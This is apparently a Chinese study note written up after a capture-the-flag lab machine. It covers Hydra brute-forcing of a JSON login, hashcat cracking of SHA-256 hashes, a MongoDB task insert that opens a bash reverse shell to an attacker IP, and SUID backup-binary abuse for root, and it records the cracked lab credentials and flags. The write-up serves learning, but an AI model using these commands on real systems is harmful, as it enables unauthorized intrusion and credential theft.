0x00.前言

只是一篇学习笔记

0x01.Hydra爆破后台

Hydra爆破（json格式对于单双引号及冒号需要反斜杠转义）：
hydra -l none -P /usr/share/wordlists/fasttrack.txt -f 10.10.10.58 http-post-form "/api/session/authenticate:{\"username\"\:\"tom\",\"password\"\:\"^PASS^\"}:false" -t 64 -V

0x02.爆破目录得到后台密文(sha256)，解密后到后台下载backup文件

hashcat破解sha256密文：
hashcat -a 0 -m 1400 /home/kali/Desktop/hash.txt /usr/share/wordlists/rockyou.txt 

得到结果：user：myP14ceAdm1nAcc0uNT    pass:manchester

登陆后台下载完backup；backup文件看上去是base64编码，将其解码：

cat myplace.backup | base64 --decode > backup

发现压缩包需要密码，爆破得到密码：magicword
解压后得到用户mark的ssh登录密码。

0x03.Moongo数据库得(tom)反弹shell

Mongo数据库：mark/5AYRft73VtFpc84k

Mongo执行命令反弹shell

db.tasks.insert({"cmd": "bash -c 'bash -i >& /dev/tcp/10.10.14.2/4444 0>&1'"})

user.txt：e1156acc3574e04b06908ecf76be91b1

adm组的意义：传统上，adm组用于授予用户访问某种系统日志文件的权限

0x04.缓冲区溢出(二进制漏洞)

发现backup文件(SUID)的两种方式：

• 1.提权脚本Linpea.sh
• 2.id查看用户所属1002admin组(1000以上的组为用户自建)，再通过命令(find / -group admin -ls 2>/dev/null)找到从属该组的文件

ltrace命令：用来跟踪进程调用库函数的情况。

export HOME=/root/

backup test a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 "~"

cat root_base64 | base64 --decode > root_backup

unzip root_backup
unzip pass:magicword

root.txt：1722e99ca5f353b362556a62bd5e6be0

0x05.总结

新工具：feroxbuster（目录爆破），hashcat（Hash破解），CrackStation（在线Hash破解），

总结：

• 1.目录爆破完整
• 2.利用hashcat破解Sha256
• 3.熟悉MongoDB数据库，反弹shell
• 4.找到SUID文件（adm组用来授予用户查看系统日志权限；1000以上组是用户自建组）
• 5.缓冲区溢出漏洞利用